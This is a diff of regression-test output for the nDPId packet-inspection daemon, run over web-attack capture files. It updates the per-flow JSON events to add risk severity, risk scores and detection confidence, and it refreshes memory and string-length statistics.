+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348407419,"flow_last_seen":1499348412425,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36196,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348413192,"flow_last_seen":1499348418262,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2300,"flow_avg_l4_payload_len":230,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36198,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348422024,"flow_last_seen":1499348427063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36200,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1499348433464,"flow_last_seen":1499348438551,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":4149,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":431,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348467295,"flow_last_seen":1499348472302,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2021,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":262,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36204,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348480992,"flow_last_seen":1499348486002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":530,"flow_tot_l4_payload_len":1053,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348494345,"flow_last_seen":1499348499355,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1840,"flow_tot_l4_payload_len":2376,"flow_avg_l4_payload_len":237,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36208,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1499348506489,"flow_last_seen":1499348511497,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1881,"flow_tot_l4_payload_len":2418,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36210,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00802{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1499348514064,"flow_last_seen":1499348519077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2701,"flow_tot_l4_payload_len":4749,"flow_avg_l4_payload_len":395,"midstream":0,"ts_msec":1499348519077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":36212,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00164{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":94,"source":"WebattackSQLinj.pcap","alias":"nDPId-test","total-events-serialized":56}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 94/94
@@ -62,10 +62,10 @@
 ~~ total active/idle flows...: 9/9
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4608883 bytes
-~~ total memory freed........: 4608883 bytes
-~~ total allocations/frees...: 99707/99707
+~~ total memory allocated....: 4691212 bytes
+~~ total memory freed........: 4691212 bytes
+~~ total allocations/frees...: 101297/101297
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 169 chars
-~~ json string max len.......: 962 chars
-~~ json string avg len.......: 635 chars
+~~ json string max len.......: 1068 chars
+~~ json string avg len.......: 688 chars
diff --git a/test/results/WebattackXSS.pcap.out b/test/results/WebattackXSS.pcap.out
index fee6d92f9..27d8ae3e2 100644
--- a/test/results/WebattackXSS.pcap.out
+++ b/test/results/WebattackXSS.pcap.out
@@ -3,7 +3,7 @@
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1499346935283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346935283,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8wadAAD4GBCmsEAABwKgKMsuCAFAodgngAAAAAKACchCXWwAAAgQFtAQCCAoBOMhHAAAAAAEDAwc="}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1499346935283,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346935283,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4I5j3VaKHYJ4aAScSBLsAAAAgQFtAQCCAoD4pm+ATjIRwEDAwc="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1499346935285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499346935285,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0wahAAD4GBDCsEAABwKgKMsuCAFAodgnhOY91W4AQAOXqtwAAAQEICgE4yEcD4pm+"}
-00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346935283,"flow_last_seen":1499346935285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1499346935285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346935283,"flow_last_seen":1499346935285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1499346935285,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52098,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346935343,"flow_last_seen":1499346935343,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499346935343,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52100,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1499346935343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346935343,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8IaBAAD4GpDCsEAABwKgKMsuEAFAW1en2AAAAAKACchDI1AAAAgQFtAQCCAoBOMhWAAAAAAEDAwc="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1499346935343,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346935343,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy4Rgmy17FtXp96AScSCd7QAAAgQFtAQCCAoD4pnNATjIVgEDAwc="}
@@ -20,7 +20,7 @@
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1499346956870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346956870,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8DqpAAD4GtyasEAABwKgKMsvoAFDxddP2AAAAAKACchDuyQAAAgQFtAQCCAoBON1cAAAAAAEDAwc="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1499346956870,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346956870,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+g57n8P8XXT96AScSCD9QAAAgQFtAQCCAoD4q7TATjdXAEDAwc="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1499346956871,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499346956871,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0DqtAAD4Gty2sEAABwKgKMsvoAFDxddP3Oe5\/EIAQAOUi\/QAAAQEICgE43VwD4q7T"}
-00856{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346956870,"flow_last_seen":1499346956871,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1499346956871,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00962{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346956870,"flow_last_seen":1499346956871,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1499346956871,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52200,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346956932,"flow_last_seen":1499346956932,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499346956932,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1499346956932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346956932,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8nj9AAD4GJ5GsEAABwKgKMsvqAFAHDkNUAAAAAKACchBpwwAAAgQFtAQCCAoBON1rAAAAAAEDAwc="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1499346956932,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346956932,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQy+qiErzRBw5DVaAScSBY+QAAAgQFtAQCCAoD4q7iATjdawEDAwc="}
@@ -37,7 +37,7 @@
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1499346976603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346976603,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Un9AAD4Gc1GsEAABwKgKMsxKAFAevqLeAAAAAKACchDe8gAAAgQFtAQCCAoBOPChAAAAAAEDAwc="}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1499346976603,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346976603,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEoKnmxhHr6i36AScSCi1wAAAgQFtAQCCAoD4sIYATjwoQEDAwc="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1499346976604,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499346976604,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UoBAAD4Gc1isEAABwKgKMsxKAFAevqLfCp5sYoAQAOVB3wAAAQEICgE48KED4sIY"}
-00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976603,"flow_last_seen":1499346976604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1499346976604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
+00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976603,"flow_last_seen":1499346976604,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":309,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":77,"midstream":0,"ts_msec":1499346976604,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52298,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499346976677,"flow_last_seen":1499346976677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499346976677,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1499346976677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346976677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8I8VAAD4GogusEAABwKgKMsxMAFCAL9N2AAAAAKACchBM1QAAAgQFtAQCCAoBOPCzAAAAAAEDAwc="}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1499346976677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346976677,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzEzfj2P1gC\/Td6AScSBEIgAAAgQFtAQCCAoD4sIqATjwswEDAwc="}
@@ -50,8 +50,8 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":132,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1499346976999,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499346976999,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzGAmGFC+ciJO0aAScSCizgAAAgQFtAQCCAoD4sJ7ATjxBAEDAwc="}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":133,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z5JAAD4GXkasEAABwKgKMsxeAFDFSpaWtwyVpoAQAOXRDgAAAQEICgE48QQD4sJ7"}
 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1499346977000,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499346977000,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0v9VAAD4GBgOsEAABwKgKMsxgAFByIk7RJhhQv4AQAOVB1gAAAQEICgE48QQD4sJ7"}
-00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":142,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976677,"flow_last_seen":1499346977863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":364,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1499346977863,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52300,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/dvwa\/js\/dvwaPage.js","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
-00845{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499346976999,"flow_last_seen":1499346977870,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":358,"flow_tot_l4_payload_len":358,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1499346977870,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52318,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/favicon.ico","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}}
